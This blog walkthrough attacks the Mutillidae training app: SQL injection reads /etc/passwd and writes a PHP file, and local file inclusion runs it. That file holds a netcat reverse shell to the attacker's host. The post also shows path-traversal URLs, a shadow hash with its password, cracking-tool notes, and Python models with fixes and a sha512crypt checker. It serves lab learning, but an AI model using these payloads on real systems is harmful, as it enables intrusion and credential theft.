About the author

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

Category: Networking and Security

2017-11-03 15:16:32

1. Using SQL injection to read and write files.
The username field of Mutillidae's user-info.php is injectable. MySQL's LOAD_FILE() function (a MySQL function, not a PHP one) reads a file on the database host and returns its contents as a string, so a UNION SELECT that puts load_file() in one of the displayed columns hands the file back in the page. /etc/passwd is read successfully; /etc/shadow comes back empty. The reason is that LOAD_FILE() opens the file as the mysqld process (normally user mysql), which can read the world-readable /etc/passwd but not /etc/shadow (root:shadow, mode 0640). On failure LOAD_FILE() returns NULL instead of an error, so the page simply shows nothing. LOAD_FILE() also requires the FILE privilege, and on newer servers the path must be permitted by secure_file_priv.


http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=kobe' union select 1,load_file("/etc/passwd"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=kobe' union select 1,load_file("/etc/shadow"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details

The %23 is a URL-encoded #, which starts a MySQL comment and swallows the closing quote and the AND password='aaa' clause the application appends; a literal # would be treated by the browser as a URL fragment and never sent. The UNION supplies five values because the accounts table the page selects from has five columns.

Writing a file uses MySQL's SELECT ... INTO OUTFILE (again a MySQL feature, not a PHP outfile() function).
First, open the page


http://192.168.0.119/mutillidae/index.php?page=user-info.php

and enter the following in the Name field:


kobe' union select null,'<?passthru("nc -e /bin/sh 192.168.0.104 8080");?>',null,null,null into outfile '/tmp/reverse.php' #
Leave the password empty and click View Account Details; the form submits via GET. The trailing # comments out the closing quote and the AND password='' clause that the application appends, and the server writes /tmp/reverse.php containing the PHP one-liner. This needs the FILE privilege for the database account, the target file must not already exist, and /tmp is used because the mysql user can write there. The file does nothing by itself: the passthru() call (and its nc -e, which requires a netcat build that supports -e) only runs once something includes the file.

2. Run the file through the Local File Inclusion vulnerability to get a reverse shell.
My Kali Linux box is 192.168.0.104. Start a listener on port 8080 on Kali:


nc -vv -l -p 8080
Then request the address below in the browser. index.php passes the page parameter to include(), so it includes /tmp/reverse.php, PHP executes the passthru() call, and a reverse shell connects back to the listener.


http://192.168.0.119/mutillidae/index.php?page=../../../../../tmp/reverse.php

3. The most entertaining part of the Local File Inclusion bug: the page parameter goes straight into include(), so /etc/passwd can be browsed directly, but trying to browse /etc/shadow produces an error. include() runs as the web server user (www-data), which, like mysql, has no read access to a 0640 root:shadow file, hence the Permission denied below. Getting the contents of /etc/shadow would be a fine thing.


http://192.168.0.119/mutillidae/index.php?page=../../../../../etc/passwd
Warning: include(../../../../../etc/shadow) []: failed to open stream: Permission denied in /var/www/mutillidae/index.php on line 469
Warning: include() []: Failed opening '../../../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/mutillidae/index.php on line 469
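Added example, not code from the original post nor from Mutillidae: the chain above, the UNION/LOAD_FILE read of section 1 and the include() traversal of sections 2 and 3, modelled offline in Python. An in-memory sqlite3 database stands in for MySQL, and a Python function registered under the name load_file stands in for LOAD_FILE(), returning NULL when the file cannot be opened, which is exactly the behaviour that made the /etc/shadow read come back empty. The accounts table layout, the query shape and the web root path are assumptions; sqlite has no INTO OUTFILE and needs `-- ` where MySQL accepted `#`, so the write-file step is not modelled.

```python
"""Offline model of the Mutillidae SQLi (LOAD_FILE) and LFI (include) bugs.

Assumptions: accounts has five columns (cid, username, password,
mysignature, is_admin); user-info.php builds its query by string
concatenation; index.php includes $_GET['page'] relative to the web root.
"""
import os
import posixpath
import sqlite3
import tempfile

# Constructed sample line standing in for /etc/passwd (not a real file).
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\n"


def load_file(path):
    """Stand-in for MySQL LOAD_FILE(): file text, or NULL (None) when the
    server process cannot open it. MySQL raises no error here, which is
    why the /etc/shadow attempt in the post simply shows nothing."""
    try:
        with open(path, "rb") as fh:
            return fh.read().decode("utf-8", "replace")
    except OSError:
        return None


def make_db():
    """In-memory accounts table; a UNION payload must supply five values."""
    con = sqlite3.connect(":memory:")
    con.create_function("load_file", 1, load_file)
    con.execute("CREATE TABLE accounts(cid INTEGER, username TEXT, "
                "password TEXT, mysignature TEXT, is_admin TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?,?,?,?,?)", [
        (1, "admin", "adminpass", "Monkey!", "TRUE"),
        (2, "kobe", "asdf", "Bryant", "FALSE"),
    ])
    return con


def user_info_vulnerable(con, username, password):
    """The injection point: user input concatenated into the SQL string."""
    sql = ("SELECT * FROM accounts WHERE username='%s' AND password='%s'"
           % (username, password))
    return con.execute(sql).fetchall()


def user_info_fixed(con, username, password):
    """Same query with bound parameters: a quote can no longer close the literal."""
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()


def read_file_via_sqli(con, path):
    """Close the string, UNION a five-column row with load_file() in the
    displayed column, comment out the rest ('-- ' here, '#' in MySQL).
    Returns the file text, or None when the DB process cannot read it."""
    payload = "kobe' UNION SELECT 1,load_file('%s'),NULL,NULL,NULL -- " % path
    rows = user_info_vulnerable(con, payload, "aaa")
    return rows[0][1] if rows else None


def include_vulnerable(web_root, page):
    """PHP include($_GET['page']) resolved against the script directory:
    '../' sequences walk out of the web root."""
    return posixpath.normpath(posixpath.join(web_root, page))


def include_hardened(web_root, page):
    """Resolve first, then refuse anything that left the web root (None)."""
    root = posixpath.normpath(web_root)
    target = posixpath.normpath(posixpath.join(root, page))
    if target != root and not target.startswith(root + "/"):
        return None
    return target


def write_constructed_passwd():
    """Write SAMPLE_PASSWD to a temp file and return its path, so the demo
    does not depend on the real /etc/passwd or on running as a given user."""
    fd, path = tempfile.mkstemp(suffix=".passwd")
    with os.fdopen(fd, "wb") as fh:
        fh.write(SAMPLE_PASSWD.encode("utf-8"))
    return path


if __name__ == "__main__":
    con = make_db()
    path = write_constructed_passwd()
    print(read_file_via_sqli(con, path))                 # readable: contents come back
    print(read_file_via_sqli(con, path + ".missing"))    # unreadable: None, like /etc/shadow
    print(user_info_fixed(con, "kobe' UNION SELECT 1,2,3,4,5 -- ", "aaa"))
    print(include_vulnerable("/var/www/mutillidae", "../../../../../tmp/reverse.php"))
    print(include_hardened("/var/www/mutillidae", "../../../../../etc/passwd"))
    os.unlink(path)
```

The same two points the post hits by hand show up in the output: the injected column carries whatever the database process can open and NULL for whatever it cannot, and the traversal string resolves to /tmp/reverse.php because include() never checks where the normalised path ended up. The parameterised query and the root check are the two fixes.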

4. Example:
On my Kali Linux box there is a user named jack with password ass123.
Opening /etc/shadow gives jack's password hash. Where does this hash come from? Checking it with hash-identifier reports SHA-256, but that is wrong: the $6$ prefix marks a glibc crypt(3) SHA-512 hash (sha512crypt), the field between the second and third $ (P/OAszmX) is the salt, and the last field is 86 characters of crypt base64 produced by 5000 chained rounds by default. hash-identifier does not understand the crypt prefix, so its guess is not worth much here.

jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::

hash-identifier
   HASH: $6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80

  Possible Hashs:
  [+]  SHA-256


The hash is salted (the salt is the field right after $6$) and iterated, so a lookup table of plain SHA-256 values cannot crack it. John the Ripper handles the format directly: john recognises the $6$ prefix on its own and can be forced with --format=sha512crypt; hashcat uses mode -m 1800.
Or look at this site:



Sha-256 is a function of the algorithm Sha-2 (as are the 384, 512, and more recently 224 bit versions), which is the evolution of Sha-1, itself an evolution of Sha-0. The Sha-2 algorithm was developed by the NSA to answer the security problem of Sha-1, since the theoretical discovery of a 2^63 operations attack for collisions. This algorithm takes as input a message of at most 2^64 bits in length, and outputs a 256 bit hash. It seems that sha256 is becoming more and more used in order to replace the old md5 hash function. I think that sha256 is actually the best replacement because of its good balance between online storage size and security. As with the other cryptographic functions of its "family", Sha-256 is one-way, so you can't find the plaintext with only the hash. You have to compare this hash to an online database, and that's what we do here with a 3,771,960,346 sha256 hash database. I looked for days to find any wordlist online. Then I computed for days to enlarge the wordlist and make it really unique.

Another site looks quite nice, but unfortunately does not support SHA-256 at all.


https://www.onlinehashcrack.com/
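Added example, not code from the post nor from hash-identifier: name the scheme from the crypt(3) prefix instead of guessing from hash length, and reimplement glibc's sha512crypt (the $6$ scheme from Ulrich Drepper's SHA-crypt specification) on top of hashlib, so a candidate password can be checked against the shadow line above offline, without the crypt module (removed in Python 3.13) and without any online database. The shadow line and the claimed password ass123 are taken from the post; the scheme table and the helper names are mine.

```python
"""sha512crypt ($6$) from scratch, plus prefix-based scheme identification.

Algorithm follows the SHA-crypt specification used by glibc crypt(3):
digests A, B, DP, DS, the P/S byte sequences, `rounds` chained SHA-512
steps and the fixed output byte permutation with the ./0-9A-Za-z alphabet.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# crypt(3) prefixes; this is what hash-identifier ignores when it says SHA-256.
SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
           "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}

# Shadow line copied from the post (user jack, claimed password ass123).
POST_SHADOW_LINE = ("jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG"
                    "4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::")


def identify(hash_field):
    """Name the crypt scheme from its '$id$' prefix, not from its length."""
    for prefix, name in SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return "unknown"


def parse_sha512crypt(hash_field):
    """Split '$6$[rounds=N$]salt$digest' into (salt, rounds, digest)."""
    parts = hash_field.split("$")
    if parts[:2] != ["", "6"] or len(parts) not in (4, 5):
        raise ValueError("not a sha512crypt hash: %r" % hash_field)
    rounds = 5000                                   # glibc default without rounds=
    if len(parts) == 5:
        if not parts[2].startswith("rounds="):
            raise ValueError("bad rounds field: %r" % parts[2])
        rounds = min(max(int(parts[2][7:]), 1000), 999999999)
    return parts[-2][:16], rounds, parts[-1]        # salt is at most 16 chars


def _fill(digest, length):
    """Repeat a 64-byte digest and truncate to `length` bytes."""
    return (digest * (length // 64 + 1))[:length]


def sha512_crypt_digest(password, salt, rounds=5000):
    """The 86-character digest part of glibc sha512crypt."""
    pw, salt = password.encode("utf-8"), salt.encode("utf-8")
    b = hashlib.sha512(pw + salt + pw).digest()                      # digest B
    a = hashlib.sha512(pw + salt + _fill(b, len(pw)))                # digest A ...
    n = len(pw)
    while n:                                  # one step per bit of len(pw)
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    p = _fill(hashlib.sha512(pw * len(pw)).digest(), len(pw))       # sequence P
    s = _fill(hashlib.sha512(salt * (16 + a[0])).digest(), len(salt))  # sequence S
    c = a
    for i in range(rounds):                   # the slow part: chained rounds
        h = hashlib.sha512(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    out = []
    for k in range(21):                       # fixed permutation: 3 bytes -> 4 chars
        trio = (c[k], c[k + 21], c[k + 42])
        r = k % 3
        b2, b1, b0 = trio[r:] + trio[:r]
        w = (b2 << 16) | (b1 << 8) | b0
        for _ in range(4):
            out.append(ITOA64[w & 0x3f])
            w >>= 6
    w = c[63]                                 # last byte -> 2 chars
    out.append(ITOA64[w & 0x3f])
    out.append(ITOA64[(w >> 6) & 0x3f])
    return "".join(out)


def sha512_crypt(password, salt, rounds=None):
    """Full crypt string; 'rounds=N$' is emitted only when rounds were given."""
    salt = salt[:16]
    if rounds is None:
        return "$6$%s$%s" % (salt, sha512_crypt_digest(password, salt))
    rounds = min(max(rounds, 1000), 999999999)
    return "$6$rounds=%d$%s$%s" % (rounds, salt, sha512_crypt_digest(password, salt, rounds))


def verify_shadow_line(line, candidate):
    """True when `candidate` hashes to the second field of a shadow line."""
    hash_field = line.split(":")[1]
    salt, rounds, digest = parse_sha512crypt(hash_field)
    return sha512_crypt_digest(candidate, salt, rounds) == digest


if __name__ == "__main__":
    field = POST_SHADOW_LINE.split(":")[1]
    print(identify(field), parse_sha512crypt(field)[:2])
    print("ass123 matches jack's line:", verify_shadow_line(POST_SHADOW_LINE, "ass123"))
```

Running the file checks ass123 against jack's line from the post. Whatever it prints, verify_shadow_line is the per-guess work that john and hashcat do, 5000 chained SHA-512 rounds keyed by the salt, which is why a table of 3.7 billion plain SHA-256 values is of no use for a $6$ entry.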


